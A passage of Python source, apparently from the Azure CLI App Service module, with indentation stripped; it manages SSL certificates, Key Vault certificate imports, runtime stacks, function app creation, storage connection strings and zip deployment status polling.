creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
if deployment_container_image_name is None:
site_config.linux_fx_version = site_config_json[KEYS.LINUX_FX_VERSION]
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# adding appsetting to site to make it a function
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
if disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
return float(version_string)
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log deployment show
-n {} -g {}""".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
